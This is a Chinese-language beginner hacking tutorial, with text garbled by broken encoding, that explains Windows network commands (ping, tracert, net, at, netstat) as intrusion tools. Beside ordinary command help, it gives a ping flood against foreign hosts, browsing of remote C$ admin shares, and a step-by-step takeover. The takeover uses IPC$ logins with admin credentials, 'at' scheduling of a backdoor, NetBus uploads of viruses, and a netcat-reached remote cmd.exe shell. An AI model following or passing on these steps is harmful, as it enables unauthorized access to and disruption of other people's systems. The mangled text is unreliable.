要想做一名真正的黑客�,僅僅依靠網(wǎng)絡(luò)流傳的黑軟進(jìn)行掃描或者攻擊是沒有用的,這樣永遠(yuǎn)不可能成長為一名真正的黑客�,大家需要注意的是�����,平時還得注意積累�,這次筆者就簡單的 為大家介紹一些系統(tǒng)命令��,對于初學(xué)的菜鳥絕對是必修課之一��。
對了����,再說兩句廢話吧,“工欲善其事�����,必先利其器”——當(dāng)然不是讓你再滿世界去找新的黑客軟件啦(其實(shí)我不反對使用這些軟件���,相反我很喜歡用它們��,但是必須是在知其所以然的情況下使用����,才有可能對自身的電腦水平有所幫助)���,要進(jìn)行入侵工作的話�,至少(我認(rèn)為)得裝上NT操作系統(tǒng),以它作為入侵平臺����,因?yàn)镹T本身對網(wǎng)絡(luò)的支持可以說比WIN9X來得更強(qiáng)大得多……當(dāng)然,如果想對UNIX系統(tǒng)動點(diǎn)小手術(shù)(網(wǎng)絡(luò)中的UNIX可始終還是主流呀)而又沒錢裝UNIX的話��,LINUX也極佳的選擇(特別是現(xiàn)在國內(nèi)至少有七八種中文LINUX版本——想當(dāng)年要給REDHAT配上中文支持是何等麻煩……)���,至少你可以借此了解UNIX系統(tǒng)的基本操作以及文件存放位置�����、系統(tǒng)配置����、編譯器�����、各種動作之后的記錄等等……
然后還得再學(xué)點(diǎn)編程語言�,至少C與UNIX下的SHELL編程得會一點(diǎn),能看懂人家寫的利用各種漏洞的程序,能對它進(jìn)行修改����,偶爾還能寫幾個小程序放到網(wǎng)上讓大伙兒樂樂,這樣玩起來才可能有成就感(其實(shí)我自己還不太行���,但這多少是個目標(biāo))
好了,廢話少說�,先講講一些M$系統(tǒng)里自帶的相關(guān)網(wǎng)絡(luò)程序的使用吧。
在M$的操作系統(tǒng)中��,與網(wǎng)絡(luò)安全較有關(guān)系的幾個命令/程序是:ping\winipcfg\tracert\net\at\netstat,且待我慢慢道來:
1. ping:這是TCP/IP協(xié)議中最有用的命令之一
它給另一個系統(tǒng)發(fā)送一系列的數(shù)據(jù)包����,該系統(tǒng)本身又發(fā)回一個響應(yīng),這條實(shí)用程序?qū)Σ檎疫h(yuǎn)程主機(jī)很有用�,它返回的結(jié)果表示是否能到達(dá)主機(jī),宿主機(jī)發(fā)送一個返回數(shù)據(jù)包需要多長時間��。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人為中止�����,否則一直ping下去)
-a Resolve addresses to hostnames.(把IP轉(zhuǎn)為主機(jī)名)
-n count Number of echo requests to send.(響應(yīng)請求的數(shù)量)
-l size Send buffer size.(封包的大?。?
-f Set Don't Fragment flag in packet.(信息包中無碎片)
-i TTL Time To Live.(時間)
-v TOS Type Of Service.(服務(wù)類型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(較嚴(yán)格的……唉,怎么譯好……算了,放著吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的時間)
比如大家可能都知道的一個命令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死霉國佬時所用的命令(當(dāng)然這樣只會造成我方自己的網(wǎng)絡(luò)阻塞)���。
其實(shí)這個命令主要是用來看對方應(yīng)答的速度��,如果怎么ping 得到的結(jié)果都是request time out���。那恐怕你根本就不用你去找這臺主機(jī)了,它不在你的射程之內(nèi)���。
2. winipcfg:
這是用來看自己IP位址的小工具�,win98自帶���,NT里則網(wǎng)絡(luò)監(jiān)視器里就能看到IP了����,還有個小實(shí)用程序叫……好象是叫IPCONFIG吧���,沒怎么用�����,都快忘了……這種東東網(wǎng)上其實(shí)相當(dāng)之多����,但既然“自帶”,又何須外求���,何況網(wǎng)上下載的黑客的東東里有沒有特洛伊猶未可知����,再說了��,如果你不是在自己的“愛姬”上運(yùn)行��,豈不是就沒法干活���?——哈,不好意思���,跑題了����,但——接著跑兩句:可以把一些常用的��、經(jīng)典的工具上傳到網(wǎng)上���,當(dāng)作一個備份�����,什么時候在網(wǎng)吧�、某家公司要干活的話,直接下載就是一個完整無缺的工具包了����。
這個東東相當(dāng)簡單,直接在DOS下鍵入命令就是了�,沒有什么參數(shù)。
3. tracert:是驗(yàn)證通往遠(yuǎn)程主機(jī)路徑的實(shí)用程序
用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
參數(shù):
-d Do not resolve addresses to hostnames.(不將IP轉(zhuǎn)為主機(jī)名)
-h maximum_hops Maximum number of hops to search for target.(最大跟蹤數(shù)量)
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.(time out 的時間)
最簡單的用法就是 tracert hostname 其中hostname是計算機(jī)名或你想跟蹤其路徑的計算機(jī)的IP地址�����。TRACERT將返回數(shù)據(jù)包借以到達(dá)最終目的地的各種IP地址��,你知道該怎么利用它嗎�����?
我略為解釋一下吧:跟蹤通往210.142.192.130的路由��,最大30:
第一行:*&^%&* 我就是從這里出去的(呵���,真不想說^&^)
第四行:是不是快要出國了呢����?
第九行:呀!這是日本鬼子的地盤……
4. net:這可是個非常棒的東西��,如果不會用的話����,趕緊睜大眼睛噢
初級黑客安全技術(shù)命令詳解(2)
這個命令的語法是: 可用的命令包括:
NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW
NET HELP SERVICES 列出用戶可以啟動的網(wǎng)絡(luò)服務(wù)。
NET HELP SYNTAX 解釋如何閱讀 NET HELP 語法行�����。
NET HELP command | MORE 用于逐屏顯示幫助����。
我可就不逐樣解釋了——這樣會把我的手指累壞�,就說說常用的兩個命令吧
a.net view
這個命令的語法是:
NET VIEW [\\computername | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\\computername]
NET VIEW 用于顯示一個計算機(jī)上共享資源的列表。當(dāng)不帶選項(xiàng)使用本命令時��,它就會顯示當(dāng)前域或網(wǎng)絡(luò)上的計算機(jī)上的列表���。
指用戶希望瀏覽其共享資源的計算機(jī)����。
/DOMAIN:domainname 指定用戶希望瀏覽有效的計算機(jī)所在的域。如果省略了域名�,就會顯示局域網(wǎng)絡(luò)上的所有域。
/NETWORK:NW 顯示 NetWare 網(wǎng)絡(luò)上所有可用的服務(wù)器���。如果指定了一個計算機(jī)名��,就會顯示NetWare 網(wǎng)絡(luò)中那個計算機(jī)上的可用資源�。
至于舉例嘛�,比如你知道一個遠(yuǎn)程計算機(jī)***.***.**.***上有開資源共享,那么運(yùn)行net view \\***.***.**.*** 就可以了
b.net use
這個命令的語法是:NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
NET USE 用于將計算機(jī)與共享的資源相連接�����,或者切斷計算機(jī)與共享資源的連接�����。當(dāng)不帶選項(xiàng)使用本命令時�,它會列出計算機(jī)的連接。
devicename 指定一個名字以便與資源相連接�,或者指定要切斷的設(shè)備。有兩種類型的設(shè)備名:磁盤驅(qū)動器 (D: 至 Z:) 和打印機(jī) (LPT1: 至 LPT3:)����。輸入一個星號來代替一個指定的設(shè)備名可以分配下一個可用設(shè)備名��。
指控制共享資源的計算機(jī)的名字�。如果計算機(jī)名中包含有空字符����,就要將雙反斜線 (\\) 和計算機(jī)名一起用引號 (" ")括起來。計算機(jī)名可以有1 到15 個 字符�。
\sharename 指共享資源的網(wǎng)絡(luò)名字。
\volume 指定一個服務(wù)器上的 NetWare 卷��。用戶必須安裝 Netware 的客戶服務(wù)(Windows NT 工作站) 或者 Netware 的網(wǎng)關(guān)服務(wù) (Windows NT 服務(wù)器) 并使之與NetWare 服務(wù)器相連���。
password 指訪問共享資源所需要的密碼����。
* 進(jìn)行密碼提示���。當(dāng)在密碼提示符下輸入密碼時,密碼是不會顯示的�。
/USER 指定連接時的一個不同的用戶名。
domainname 指定另外一個域�����。如果缺省域,就會使用當(dāng)前登錄的域�。
username 指定登錄的用戶名。
/HOME 將用戶與他們的宿主目錄相連�����。
/DELETE 取消一個網(wǎng)絡(luò)連接�,并且從永久連接列表中刪除該連接。
/PERSISTENT 控制對永久網(wǎng)絡(luò)連接的使用����。其缺省值是最近使用的設(shè)置。
YES 在連接產(chǎn)生時保存它們�����,并在下次登錄時恢復(fù)它們��。
NO 不保存正在產(chǎn)生的連接或后續(xù)的連接��;現(xiàn)有的連接將在下次登錄時被恢復(fù)���?��?梢允褂?/DELETE 選項(xiàng)開關(guān)來刪除永久連接�。
PS:前兩天在綠色兵團(tuán)的貼子里見到一位仁兄的話�,與這個命令有異曲共工之妙,也說明一個大概:
在瀏覽器中輸入 $">file:///\\***.***.**.***\c$
則網(wǎng)上共享的C盤內(nèi)容就會顯示出來了�,就仿佛用瀏覽器上FTP站點(diǎn)看到的一樣。各位不妨試試����,還可試試舉一反三……
5.at: 排定在特定的日期和時間運(yùn)行某些命令和程序。
運(yùn)行 AT 命令之前必須先啟動 Schedule 服務(wù)����。瞧,現(xiàn)炒就得現(xiàn)賣���,剛學(xué)了net命令�����,但這個start命令我可沒詳述,自已看看幫助文件���,摸索一下各種命令的用法吧�����。
C:\>net start schedule
Schedule 正在啟動服務(wù).....
Schedulw 服務(wù)啟動成功���。
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
指定遠(yuǎn)程計算機(jī)����。如果省略這個參數(shù)命令會被排定在本機(jī)上運(yùn)行���。
id 指定給排定進(jìn)度命令的識別號�����。
/delete 刪除某個已排定進(jìn)度的命令�����。如果省略標(biāo)識����,計算機(jī)上所有已排定進(jìn)度的命令都會被刪除�。
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時顯示確認(rèn)信息 。
time 指定命令運(yùn)行的時間���。
interactive 允許作業(yè)在運(yùn)行時����,與用戶通過桌面交互����。
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行。
如果省略日期�,則默認(rèn)為在每月的本日運(yùn)行。
/next:date[,...] 指定在下一個指定日期 (如���,下周三)���,運(yùn)行命令。
如果省略日期�����,則默認(rèn)為在每月的本日運(yùn)行�。
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件。
知道了如何使用AT�����,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
1 利用管理員登陸到目的服務(wù)器��,方法為: net use $">\\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc schedule /start
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運(yùn)行����,當(dāng)然最快運(yùn)行最理想,所以��,你可以用letmein.exe得到服務(wù)器的時間����,然后:
at 00:00 ntsrv.exe /port:64321
其中00:00要改為用letmein.exe得回來的具體時間+一點(diǎn)容量,等一會后��,再在本地啟動netbus.exe�����,鍵入目的服務(wù)器得ip地址或hostname�����,連接�����!比如第一種方法,你想要在目的服務(wù)器運(yùn)行諸如病毒之類的東東�����,可以利用netbus得上傳功能�����,將各種“大補(bǔ)丸”上傳至目的服務(wù)器�,再用netbus的"Start program",鍵入完整路徑�����,就ok了�����!第二種方法是利用netbus的“App redirect”功能���,啟動遠(yuǎn)程telnet服務(wù)��,如下:在netbus中擊“App redirect”���,鍵入"C:\>winnt\system32\cmd.exe"��,Port為:4321�,服務(wù)就啟動了����,然后在本地運(yùn)行:nc x.x.x.x 4321��,出現(xiàn)dos啟動的畫面就表示連接成功:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>
4.netstat 這是一個觀察網(wǎng)絡(luò)連接狀態(tài)的實(shí)用工具���。
它能檢驗(yàn)IP的當(dāng)前連接狀態(tài)�,在斷定你的基本級通信正在進(jìn)行后�,就要驗(yàn)證系統(tǒng)上的服務(wù)。這個服務(wù)包括檢查正在收聽輸入的通信量和/或驗(yàn)證你正在創(chuàng)建一個與遠(yuǎn)程站點(diǎn)的會話��,它可以很輕松地做到這一點(diǎn)���。網(wǎng)上也可以看到很多如X-netstat之類的工具�,是WIN界面的��,更加直觀而已����,并沒有多什么功能���,這個命令的具體用法如下:
Displays protocol statistics and current TCP/IP network connections.(顯示協(xié)議與當(dāng)前網(wǎng)絡(luò)連接)
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.(顯示所有連接和監(jiān)聽端口)
-e Displays Ethernet statistics. This may be combined with the -s
option.(顯示以太連接,可以與-s連用)
-n Displays addresses and port numbers in numerical form.(顯示地址和端口)
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.(interval是設(shè)定一個刷新時間��,在間隔時間內(nèi)暫停�,按CTRL+C停止……)
這是我在本機(jī)未連接網(wǎng)絡(luò)時運(yùn)行的,第一列為協(xié)議����,第二列為本地地址,第三列是與你進(jìn)行連接的主機(jī)或用戶的IP位址(IP后冒號之后的數(shù)字是端口號)����,最后一列是狀態(tài)。這個命令以-n和-a的參數(shù)我較常使用�����,讀者可以參考使用��。(全文完)
